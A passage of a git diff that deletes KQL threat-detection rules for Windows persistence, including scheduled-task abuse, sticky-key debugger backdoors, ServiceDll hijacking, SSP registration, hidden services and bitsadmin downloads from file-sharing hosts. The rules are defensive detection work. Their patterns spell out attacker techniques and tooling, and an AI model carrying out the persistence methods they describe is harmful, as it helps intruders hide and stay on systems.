RegistryKey contains "aigmfoeogfnljhnofglledbhhfegannp" or RegistryKey contains "cgojmfochfikphincbhokimmmjenhhgk" or RegistryKey 
contains "ficajfeojakddincjafebjmfiefcmanc" or RegistryKey contains "ifnaibldjfdmaipaddffmgcmekjhiloa" or RegistryKey contains "jbnmpdkcfkochpanomnkhnafobppmccn" or RegistryKey contains "apcfdffemoinopelidncddjbhkiblecc" or RegistryKey contains "mjolnodfokkkaichkcjipfgblbfgojpa" or RegistryKey contains "oifjbnnafapeiknapihcmpeodaeblbkn" or RegistryKey contains "plpmggfglncceinmilojdkiijhmajkjh" or RegistryKey contains "mjnbclmflcpookeapghfhapeffmpodij" or RegistryKey contains "bblcccknbdbplgmdjnnikffefhdlobhp" or RegistryKey contains "aojlhgbkmkahabcmcpifbolnoichfeep" or RegistryKey contains "lcmammnjlbmlbcaniggmlejfjpjagiia" or RegistryKey contains "knajdeaocbpmfghhmijicidfcmdgbdpm" or RegistryKey contains "bdlcnpceagnkjnjlbbbcepohejbheilk" or RegistryKey contains "edknjdjielmpdlnllkdmaghlbpnmjmgb" or RegistryKey contains "eidnihaadmmancegllknfbliaijfmkgo" or RegistryKey contains "ckiahbcmlmkpfiijecbpflfahoimklke" or RegistryKey contains "macdlemfnignjhclfcfichcdhiomgjjb" or RegistryKey contains "chioafkonnhbpajpengbalkececleldf" or RegistryKey contains "amnoibeflfphhplmckdbiajkjaoomgnj" or RegistryKey contains "llbhddikeonkpbhpncnhialfbpnilcnc" or RegistryKey contains "pcienlhnoficegnepejpfiklggkioccm" or RegistryKey contains "iocnglnmfkgfedpcemdflhkchokkfeii" or RegistryKey contains "igahhbkcppaollcjeaaoapkijbnphfhb" or RegistryKey contains "njpmifchgidinihmijhcfpbdmglecdlb" or RegistryKey contains "ggackgngljinccllcmbgnpgpllcjepgc" or RegistryKey contains "kchocjcihdgkoplngjemhpplmmloanja" or RegistryKey contains "bnijmipndnicefcdbhgcjoognndbgkep" or RegistryKey contains "lklekjodgannjcccdlbicoamibgbdnmi" or RegistryKey contains "dbdbnchagbkhknegmhgikkleoogjcfge" or RegistryKey contains "egblhcjfjmbjajhjhpmnlekffgaemgfh" or RegistryKey contains "ehbhfpfdkmhcpaehaooegfdflljcnfec" or RegistryKey contains "bkkgdjpomdnfemhhkalfkogckjdkcjkg" or RegistryKey contains "almalgbpmcfpdaopimbdchdliminoign" or RegistryKey contains "akkbkhnikoeojlhiiomohpdnkhbkhieh" or 
RegistryKey contains "gbfgfbopcfokdpkdigfmoeaajfmpkbnh" or RegistryKey contains "bniikohfmajhdcffljgfeiklcbgffppl" or RegistryKey contains "lejgfmmlngaigdmmikblappdafcmkndb" or RegistryKey contains "ffhhkmlgedgcliajaedapkdfigdobcif" or RegistryKey contains "gcknhkkoolaabfmlnjonogaaifnjlfnp" or RegistryKey contains "pooljnboifbodgifngpppfklhifechoe" or RegistryKey contains "fjoaledfpmneenckfbpdfhkmimnjocfa" or RegistryKey contains "aakchaleigkohafkfjfjbblobjifikek" or RegistryKey contains "dpplabbmogkhghncfbfdeeokoefdjegm" or RegistryKey contains "padekgcemlokbadohgkifijomclgjgif" or RegistryKey contains "bfidboloedlamgdmenmlbipfnccokknp") \ No newline at end of file diff --git a/Persistence/Scheduled_TaskCache_Change_by_Uncommon_Program.kql b/Persistence/Scheduled_TaskCache_Change_by_Uncommon_Program.kql deleted file mode 100644 index 5d08fc53..00000000 --- a/Persistence/Scheduled_TaskCache_Change_by_Uncommon_Program.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Syed Hasan (@syedhasan009) -// Date: 2021/06/18 -// Level: high -// Description: Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious -// Tags: attack.persistence, attack.t1053, attack.t1053.005 -DeviceRegistryEvents -| where RegistryKey contains "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache" and (not(((RegistryKey contains "Microsoft\\Windows\\UpdateOrchestrator" or RegistryKey contains "Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask\\Index" or RegistryKey contains "Microsoft\\Windows\\Flighting\\OneSettings\\RefreshCache\\Index") or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Dropbox\\Update\\DropboxUpdate.exe", "C:\\Program Files\\Dropbox\\Update\\DropboxUpdate.exe")) or (InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe" and RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Microsoft\\Windows\\PLA\\Server Manager Performance Monitor") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\msiexec.exe" or (InitiatingProcessFolderPath endswith "\\ngen.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework" and (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}" or RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Microsoft\\Windows\\.NET Framework\\.NET Framework NGEN")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\Integration\\Integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\Integration\\Integrator.exe")) or InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\svchost.exe" or InitiatingProcessFolderPath =~ "System" or (InitiatingProcessFolderPath endswith "\\TiWorker.exe" and InitiatingProcessFolderPath startswith 
"C:\\Windows\\")))) \ No newline at end of file diff --git a/Persistence/Scheduled_Task_Creation_Via_Schtasks.EXE.kql b/Persistence/Scheduled_Task_Creation_Via_Schtasks.EXE.kql deleted file mode 100644 index 0ea2e752..00000000 --- a/Persistence/Scheduled_Task_Creation_Via_Schtasks.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2019/01/16 -// Level: low -// Description: Detects the creation of scheduled tasks by user accounts via the "schtasks" utility. -// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.t1053.005, attack.s0111, car.2013-08-001, stp.1u -DeviceProcessEvents -| where (ProcessCommandLine contains " /create " and FolderPath endswith "\\schtasks.exe") and (not((AccountName contains "AUTHORI" or AccountName contains "AUTORI"))) \ No newline at end of file diff --git a/Persistence/Scheduled_Task_Executing_Encoded_Payload_from_Registry.kql b/Persistence/Scheduled_Task_Executing_Encoded_Payload_from_Registry.kql deleted file mode 100644 index 3d746a96..00000000 --- a/Persistence/Scheduled_Task_Executing_Encoded_Payload_from_Registry.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport, X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/02/12 -// Level: high -// Description: Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell. -// Tags: attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001 -DeviceProcessEvents -| where ProcessCommandLine contains "/Create" and (ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "encodedcommand") and (ProcessCommandLine contains "Get-ItemProperty" or ProcessCommandLine contains " gp ") and (ProcessCommandLine contains "HKCU:" or ProcessCommandLine contains "HKLM:" or ProcessCommandLine contains "registry::" or ProcessCommandLine contains "HKEY_") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") \ No newline at end of file diff --git a/Persistence/Scheduled_Task_Executing_Payload_from_Registry.kql b/Persistence/Scheduled_Task_Executing_Payload_from_Registry.kql deleted file mode 100644 index 0e49c7fb..00000000 --- a/Persistence/Scheduled_Task_Executing_Payload_from_Registry.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/07/18 -// Level: medium -// Description: Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell. -// Tags: attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "/Create" and (ProcessCommandLine contains "Get-ItemProperty" or ProcessCommandLine contains " gp ") and (ProcessCommandLine contains "HKCU:" or ProcessCommandLine contains "HKLM:" or ProcessCommandLine contains "registry::" or ProcessCommandLine contains "HKEY_") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")) and (not((ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "encodedcommand"))) \ No newline at end of file diff --git a/Persistence/Schtasks_Creation_Or_Modification_With_SYSTEM_Privileges.kql b/Persistence/Schtasks_Creation_Or_Modification_With_SYSTEM_Privileges.kql deleted file mode 100644 index c68909e4..00000000 --- a/Persistence/Schtasks_Creation_Or_Modification_With_SYSTEM_Privileges.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/28 -// Level: high -// Description: Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges -// Tags: attack.execution, attack.persistence, attack.t1053.005 -DeviceProcessEvents -| where (((ProcessCommandLine contains " /change " or ProcessCommandLine contains " /create ") and FolderPath endswith "\\schtasks.exe") and ProcessCommandLine contains "/ru " and (ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM ")) and (not(((ProcessCommandLine contains "/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR " or ProcessCommandLine contains ":\\Program Files (x86)\\Avira\\System Speedup\\setup\\avira_speedup_setup.exe" or ProcessCommandLine contains "/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST") or ((ProcessCommandLine contains "/TN TVInstallRestore" and ProcessCommandLine contains "\\TeamViewer_.exe") and FolderPath endswith "\\schtasks.exe")))) \ No newline at end of file diff --git a/Persistence/Security_Support_Provider_(SSP)_Added_to_LSA_Configuration.kql b/Persistence/Security_Support_Provider_(SSP)_Added_to_LSA_Configuration.kql deleted file mode 100644 index 7d8944ed..00000000 --- a/Persistence/Security_Support_Provider_(SSP)_Added_to_LSA_Configuration.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: iwillkeepwatch -// Date: 2019/01/18 -// Level: high -// Description: Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows. - -// Tags: attack.persistence, attack.t1547.005 -DeviceRegistryEvents -| where (RegistryKey endswith "\\Control\\Lsa\\Security Packages" or RegistryKey endswith "\\Control\\Lsa\\OSConfig\\Security Packages") and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\system32\\msiexec.exe", "C:\\Windows\\syswow64\\MsiExec.exe")))) \ No newline at end of file 
diff --git a/Persistence/ServiceDll_Hijack.kql b/Persistence/ServiceDll_Hijack.kql deleted file mode 100644 index fb9f8be0..00000000 --- a/Persistence/ServiceDll_Hijack.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: frack113 -// Date: 2022/02/04 -// Level: medium -// Description: Detects changes to the "ServiceDLL" value related to a service in the registry. -This is often used as a method of persistence. - -// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003 -DeviceRegistryEvents -| where ((RegistryKey contains "\\System" and RegistryKey contains "ControlSet" and RegistryKey contains "\\Services") and RegistryKey endswith "\\Parameters\\ServiceDll") and (not(((RegistryValueData =~ "%%systemroot%%\\system32\\ntdsa.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\lsass.exe" and RegistryKey endswith "\\Services\\NTDS\\Parameters\\ServiceDll") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" or RegistryValueData =~ "C:\\Windows\\system32\\spool\\drivers\\x64\\3\\PrintConfig.dll"))) and (not((RegistryValueData =~ "C:\\Windows\\System32\\STAgent.dll" and InitiatingProcessFolderPath endswith "\\regsvr32.exe"))) \ No newline at end of file diff --git a/Persistence/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql b/Persistence/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql deleted file mode 100644 index 04c45340..00000000 --- a/Persistence/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Andreas Hunkeler (@Karneades) -// Date: 2021/12/20 -// Level: high -// Description: Detects usage of the "sc.exe" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable. -// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011 -DeviceProcessEvents -| where (ProcessCommandLine contains "sdset" and ProcessCommandLine contains "DCLCWPDTSD") and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") \ No newline at end of file diff --git a/Persistence/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql b/Persistence/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql deleted file mode 100644 index a2adcfc1..00000000 --- a/Persistence/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/02/28 -// Level: medium -// Description: Detection of sc.exe utility adding a new service with special permission which hides that service. -// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011 -DeviceProcessEvents -| where ProcessCommandLine contains "sdset" and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") \ No newline at end of file diff --git a/Persistence/Session_Manager_Autorun_Keys_Modification.kql b/Persistence/Session_Manager_Autorun_Keys_Modification.kql deleted file mode 100644 index d2a2b737..00000000 --- a/Persistence/Session_Manager_Autorun_Keys_Modification.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) -// Date: 2019/10/25 -// Level: medium -// Description: Detects modification of autostart extensibility point (ASEP) in registry. -// Tags: attack.persistence, attack.t1547.001, attack.t1546.009 -DeviceRegistryEvents -| where RegistryKey contains "\\System\\CurrentControlSet\\Control\\Session Manager" and (RegistryKey contains "\\SetupExecute" or RegistryKey contains "\\S0InitialCommand" or RegistryKey contains "\\KnownDlls" or RegistryKey contains "\\Execute" or RegistryKey contains "\\BootExecute" or RegistryKey contains "\\AppCertDlls") and (not(RegistryValueData =~ "(Empty)")) \ No newline at end of file diff --git a/Persistence/Shell_Process_Spawned_by_Java.EXE.kql b/Persistence/Shell_Process_Spawned_by_Java.EXE.kql deleted file mode 100644 index 534b99c8..00000000 --- a/Persistence/Shell_Process_Spawned_by_Java.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Andreas Hunkeler (@Karneades), Nasreddine Bencherchali -// Date: 2021/12/17 -// Level: medium -// Description: Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation) -// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation -DeviceProcessEvents -| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and InitiatingProcessFolderPath endswith "\\java.exe") and (not((ProcessCommandLine contains "build" and InitiatingProcessFolderPath contains "build"))) \ No newline at end of file diff --git a/Persistence/Startup_Folder_File_Write.kql b/Persistence/Startup_Folder_File_Write.kql deleted file mode 100644 index d547ca8a..00000000 --- a/Persistence/Startup_Folder_File_Write.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020/05/02 -// Level: medium -// Description: A General detection for files being created in the Windows startup directory. This could be an indicator of persistence. -// Tags: attack.persistence, attack.t1547.001 -DeviceFileEvents -| where FolderPath contains "\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp" and (not((InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\wuauclt.exe" or FolderPath startswith "C:\\$WINDOWS.~BT\\NewOS\\"))) \ No newline at end of file diff --git a/Persistence/Sticky_Key_Like_Backdoor_Execution.kql b/Persistence/Sticky_Key_Like_Backdoor_Execution.kql deleted file mode 100644 index 0509bca7..00000000 --- a/Persistence/Sticky_Key_Like_Backdoor_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community -// Date: 2018/03/15 -// Level: critical -// Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen -// Tags: attack.privilege_escalation, attack.persistence, attack.t1546.008, car.2014-11-003, car.2014-11-008 -DeviceProcessEvents -| where (ProcessCommandLine contains "sethc.exe" or ProcessCommandLine contains "utilman.exe" or ProcessCommandLine contains "osk.exe" or ProcessCommandLine contains "Magnify.exe" or ProcessCommandLine contains "Narrator.exe" or ProcessCommandLine contains "DisplaySwitch.exe") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wt.exe") and InitiatingProcessFolderPath endswith "\\winlogon.exe" \ No newline at end of file 
diff --git a/Persistence/Sticky_Key_Like_Backdoor_Usage_-_Registry.kql b/Persistence/Sticky_Key_Like_Backdoor_Usage_-_Registry.kql deleted file mode 100644 index 0a1e634c..00000000 --- a/Persistence/Sticky_Key_Like_Backdoor_Usage_-_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community -// Date: 2018/03/15 -// Level: critical -// Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen -// Tags: attack.privilege_escalation, attack.persistence, attack.t1546.008, car.2014-11-003, car.2014-11-008 -DeviceRegistryEvents -| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnify.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\DisplaySwitch.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\atbroker.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\HelpPane.exe\\Debugger" \ No newline at end of file diff --git a/Persistence/Suspicious_ASPX_File_Drop_by_Exchange.kql b/Persistence/Suspicious_ASPX_File_Drop_by_Exchange.kql deleted file mode 100644 index e3938878..00000000 
--- a/Persistence/Suspicious_ASPX_File_Drop_by_Exchange.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), MSTI (query, idea) -// Date: 2022/10/01 -// Level: high -// Description: Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder -// Tags: attack.persistence, attack.t1505.003 -DeviceFileEvents -| where (InitiatingProcessCommandLine contains "MSExchange" and InitiatingProcessFolderPath endswith "\\w3wp.exe" and (FolderPath contains "FrontEnd\\HttpProxy\\" or FolderPath contains "\\inetpub\\wwwroot\\aspnet_client\\")) and (FolderPath endswith ".aspx" or FolderPath endswith ".asp" or FolderPath endswith ".ashx") \ No newline at end of file diff --git a/Persistence/Suspicious_Child_Process_Of_SQL_Server.kql b/Persistence/Suspicious_Child_Process_Of_SQL_Server.kql deleted file mode 100644 index b669d6d5..00000000 --- a/Persistence/Suspicious_Child_Process_Of_SQL_Server.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: FPT.EagleEye Team, wagga -// Date: 2020/12/11 -// Level: high -// Description: Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection. -// Tags: attack.t1505.003, attack.t1190, attack.initial_access, attack.persistence, attack.privilege_escalation -DeviceProcessEvents -| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\wsl.exe") and InitiatingProcessFolderPath endswith "\\sqlservr.exe") and (not((ProcessCommandLine startswith "\"C:\\Windows\\system32\\cmd.exe\" " and FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and InitiatingProcessFolderPath endswith "DATEV_DBENGINE\\MSSQL\\Binn\\sqlservr.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft SQL Server\\"))) \ No newline at end of file diff --git a/Persistence/Suspicious_Child_Process_Of_Veeam_Dabatase.kql b/Persistence/Suspicious_Child_Process_Of_Veeam_Dabatase.kql deleted file mode 100644 index b9990b32..00000000 --- a/Persistence/Suspicious_Child_Process_Of_Veeam_Dabatase.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/04 -// Level: critical -// Description: Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection. -// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation -DeviceProcessEvents -| where (InitiatingProcessCommandLine contains "VEEAMSQL" and InitiatingProcessFolderPath endswith "\\sqlservr.exe") and (((ProcessCommandLine contains "-ex " or ProcessCommandLine contains "bypass" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "copy ") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\wt.exe")) or (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\whoami.exe")) \ No newline at end of file diff --git a/Persistence/Suspicious_Chromium_Browser_Instance_Executed_With_Custom_Extension.kql b/Persistence/Suspicious_Chromium_Browser_Instance_Executed_With_Custom_Extension.kql deleted file mode 100644 index 6ce7feb5..00000000 --- a/Persistence/Suspicious_Chromium_Browser_Instance_Executed_With_Custom_Extension.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Aedan Russell, frack113, X__Junior (Nextron Systems) -// Date: 2022/06/19 -// Level: high -// Description: Detects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension -// Tags: attack.persistence, attack.t1176 -DeviceProcessEvents -| where ProcessCommandLine contains "--load-extension=" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") \ No newline at end of file diff --git a/Persistence/Suspicious_Debugger_Registration_Cmdline.kql b/Persistence/Suspicious_Debugger_Registration_Cmdline.kql deleted file mode 100644 index 8a4f2a41..00000000 --- a/Persistence/Suspicious_Debugger_Registration_Cmdline.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro -// Date: 2019/09/06 -// Level: high -// Description: Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor). -// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.008 -DeviceProcessEvents -| where ProcessCommandLine contains "\\CurrentVersion\\Image File Execution Options\\" and (ProcessCommandLine contains "sethc.exe" or ProcessCommandLine contains "utilman.exe" or ProcessCommandLine contains "osk.exe" or ProcessCommandLine contains "magnify.exe" or ProcessCommandLine contains "narrator.exe" or ProcessCommandLine contains "displayswitch.exe" or ProcessCommandLine contains "atbroker.exe" or ProcessCommandLine contains "HelpPane.exe") \ No newline at end of file diff --git a/Persistence/Suspicious_Download_From_Direct_IP_Via_Bitsadmin.kql b/Persistence/Suspicious_Download_From_Direct_IP_Via_Bitsadmin.kql deleted file mode 100644 index 194705f0..00000000 --- a/Persistence/Suspicious_Download_From_Direct_IP_Via_Bitsadmin.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/06/28 -// Level: high -// Description: Detects usage of bitsadmin downloading a file using an URL that contains an IP -// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003 -DeviceProcessEvents -| where ((ProcessCommandLine contains "://1" or ProcessCommandLine contains "://2" or ProcessCommandLine contains "://3" or ProcessCommandLine contains "://4" or ProcessCommandLine contains "://5" or ProcessCommandLine contains "://6" or ProcessCommandLine contains "://7" or ProcessCommandLine contains "://8" or ProcessCommandLine contains "://9") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")) and (not(ProcessCommandLine contains "://7-")) \ No newline at end of file diff --git a/Persistence/Suspicious_Download_From_File-Sharing_Website_Via_Bitsadmin.kql b/Persistence/Suspicious_Download_From_File-Sharing_Website_Via_Bitsadmin.kql deleted file mode 100644 index b4aa432b..00000000 --- a/Persistence/Suspicious_Download_From_File-Sharing_Website_Via_Bitsadmin.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/06/28 -// Level: high -// Description: Detects usage of bitsadmin downloading a file from a suspicious domain -// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003 -DeviceProcessEvents -| where (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "cdn.discordapp.com/attachments/" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "ufile.io") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") \ No newline at end of file 
diff --git a/Persistence/Suspicious_Driver_Install_by_pnputil.exe.kql b/Persistence/Suspicious_Driver_Install_by_pnputil.exe.kql deleted file mode 100644 index 243e56dd..00000000 --- a/Persistence/Suspicious_Driver_Install_by_pnputil.exe.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger -// Date: 2021/09/30 -// Level: medium -// Description: Detects when a possible suspicious driver is being installed via pnputil.exe lolbin -// Tags: attack.persistence, attack.t1547 -DeviceProcessEvents -| where (ProcessCommandLine contains "-i" or ProcessCommandLine contains "/install" or ProcessCommandLine contains "-a" or ProcessCommandLine contains "/add-driver" or ProcessCommandLine contains ".inf") and FolderPath endswith "\\pnputil.exe" \ No newline at end of file diff --git a/Persistence/Suspicious_Environment_Variable_Has_Been_Registered.kql b/Persistence/Suspicious_Environment_Variable_Has_Been_Registered.kql deleted file mode 100644 index 700cfc45..00000000 --- a/Persistence/Suspicious_Environment_Variable_Has_Been_Registered.kql +++ /dev/null 
